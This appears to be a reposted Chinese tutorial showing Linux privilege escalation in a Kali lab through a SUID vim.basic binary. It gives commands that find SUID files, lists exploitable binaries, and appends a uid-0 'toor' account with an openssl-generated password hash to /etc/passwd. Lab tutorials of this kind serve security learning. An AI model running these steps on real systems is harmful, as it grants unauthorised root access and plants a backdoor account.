在kali上復(fù)現(xiàn)

先給需要的vim.basic文件設(shè)置suid權(quán)限

chmod u+s /usr/bin/vim.basic

先adduser test1一個普通權(quán)限用戶

現(xiàn)在就是一個合適的提權(quán)環(huán)境

通過以下命令可以找到存在suid權(quán)限的文件

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \；

可用于提權(quán)的文件有

nmap

vim

find

bash

more

less

nano

cp

利用vim提權(quán)的思路是修改etc/passwd文件，為自己添加一個有root權(quán)限的用戶

passwd文件用戶格式為：用戶名:密碼:uid:gid:注釋:home目錄:用戶的shell

這邊可以看看root用戶的格式

root:x:0:0:root:/root:/bin/bash

(密碼這部分之所以是x，是因為真正的密碼存在/etc/shadow文件里)

生成密碼：用openssl passwd -1 –salt asd 123? (這里是-1(數(shù)字1)不是L)

直接寫在passwd文件里面，

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改，但是在保存是會出現(xiàn)E212，無法保存，提示我們沒有權(quán)限修改這個

這時應(yīng)該用之前find找到的vim.basic文件運行，這個程序是有suid權(quán)限的。絕對可以修改

vim.basic /etc/passwd

用這個打開，然后修改文件，就可以成功保存

可以看到已經(jīng)添加了，su toor切換，密碼123，再id查看一下權(quán)限

root權(quán)限

chmod u+s /usr/bin/vim.basic

來源：https://www.cnblogs.com/This-is-Y/p/13211224.html

總結(jié)

以上是生活随笔為你收集整理的linux利用* vim提权,linux 通过suid vim.basic文件提权的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。